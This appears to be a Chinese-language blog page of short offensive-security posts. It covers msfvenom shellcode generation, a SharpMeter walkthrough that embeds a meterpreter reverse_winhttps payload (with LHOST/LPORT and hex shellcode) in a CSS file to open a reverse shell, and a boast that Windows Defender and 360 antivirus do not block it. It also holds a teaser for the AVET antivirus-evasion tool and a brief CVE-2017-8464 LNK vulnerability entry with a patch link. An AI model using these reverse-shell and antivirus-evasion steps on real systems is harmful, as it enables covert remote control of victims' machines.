msfvenom生成shellcode

metasploit团队将msfpayload&msfencode更改为msfvenom,因此我将上述代码转换为msfvenom:

这条命令在kali2.0已经不行了

msfpayload windows/exec cmd=calc.exe R | msfencode -e x86/alpha_mixed -t c -v

kali 2.0下生成方法

msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c

使用 SharpMeter-Meterpreter反弹shell

项目地址:

使用

kali

msfvenom -p windows/meterpreter/reverse_winhttps lhost=172.16.75.239 lport=5555 -f hex

Windows

SharpMeter.py embed maohou.css fce8820 2000005356686c29247effd585c074c28b0701c385c075e558c35fe807ffffff3100370032002e00310036002e00370035002e003200330039000000bbf0b5a2566a0053ffd5 -m -w

kali 开启监听

windows执行

 

然后就成功了!

经过测试:Windows Defender/360杀毒 不拦截。

AVET 安装使用配合 Metasploit

avet 项目地址
AVET是一种防病毒逃避工具。
安装编译器

Continue reading “AVET 安装使用配合 Metasploit”

CVE-2017-8464

CVE-2017-8464

LNK文件(快捷方式)远程代码执行漏洞

漏洞影响范围

Windows 10
Windows 7
Windows 8.1
Windows RT 8.1
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016

补丁地址:

https://support.microsoft.com/zh-cn/help/4025686/microsoft-security-a dvisory-4025685-guidance-for-supported-platforms

关闭系统自动播放功能。